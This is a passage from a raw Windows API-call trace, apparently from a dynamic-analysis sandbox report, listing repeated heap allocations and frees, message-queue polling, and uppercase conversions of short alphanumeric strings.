hHeap=0x25c0000) returned 1 [0252.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0252.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0252.366] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0252.367] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0252.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2c18 [0252.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0252.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa60 [0252.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0252.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0252.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.368] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0252.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0252.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0252.369] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0252.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0252.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0252.369] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.369] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0252.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0252.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.370] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.371] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0252.371] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.371] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0252.371] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0252.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0252.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.371] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0252.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0252.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.372] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0252.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0252.372] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.372] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0252.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0252.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.374] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.374] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0252.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0252.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0252.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0252.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0252.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0252.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0252.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0252.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0252.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0252.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0252.375] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0252.375] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0252.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0252.376] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0252.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0252.376] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0252.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0252.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0252.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1888 [0252.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0252.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17a8 [0252.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0252.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6a0 [0252.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0252.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0252.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0252.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0252.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0252.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0252.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0252.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa958 [0252.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0252.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0252.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0252.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0252.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0252.379] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.379] HeapFree (in: hHeap=0x25c0000, 